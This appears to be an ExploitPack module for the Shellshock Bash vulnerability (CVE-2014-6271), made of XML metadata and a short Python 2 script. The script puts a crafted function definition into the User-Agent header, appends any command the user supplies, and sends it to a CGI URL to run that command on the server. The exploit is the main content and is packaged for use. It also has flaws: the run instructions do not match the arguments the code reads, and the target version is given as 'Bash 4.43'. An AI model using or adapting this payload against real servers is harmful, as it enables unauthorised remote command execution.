ExploitPack GNU Bash versions 4.3 and below command injection exploit that leverages the User-Agent header against a given website.
142c835b75cbe04a6ca350ec7bb8fea228669c18def84dd5d24a93513e005852
<?xml version="1.0" encoding="UTF-8"?>
<Module>
<Exploit NameXML="Bash-CMD-Injection" CodeName="BashCMDInjection.py"
Platform="linux" Service="http" Type="remote" RemotePort="80" LocalPort=
"4444" ShellcodeAvailable="E" ShellPort="4444" SpecialArgs="">
</Exploit>
<Information Author="Juan Sacco" Date="Dec 29 2014" Vulnerability=
"2014-6271">
GNU Bash through 4.3 processes trailing strings after function definitions
in the values of
environment variables, which allows remote attackers to execute arbitrary
code via a crafted environment.
</Information>
<Targets>
Any Bash 4.43 > and prior
</Targets>
</Module>
# Modified by JSacco - jsacco@exploitpack.com
# Exploit Pack 2014
# How to run: checkCVE20146271.py http://www.server.com/script.cgi
import urllib2, sys
Target = sys.argv[1]
Port = int(sys.argv[2])
ShellcodeType = sys.argv[3]
Extra = sys.argv[4]
print "Check a host: checkbash.py http://www.domain.com/script.cgi"
print "Info: GNU Bash through 4.3 processes trailing strings after function
definitions in the values of environment variables, which allows remote
attackers to execute arbitrary code via a crafted environment, as
demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd,
the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts
executed by unspecified DHCP clients, and other situations in which setting
the environment occurs across a privilege boundary from Bash execution, aka
ShellShock."
print "###########################################################"
header = {'User-Agent': '() { :;}; echo Content-type:text/plain;echo;%s'
%(Extra)}
request = urllib2.Request(Target, '', header)
if urllib2.urlopen(request).read().find("www") != -1 or
urllib2.urlopen(request).read().find("http") != -1:
print "Response from server:", urllib2.urlopen(request).read()
print "Seems vulnerable:", Target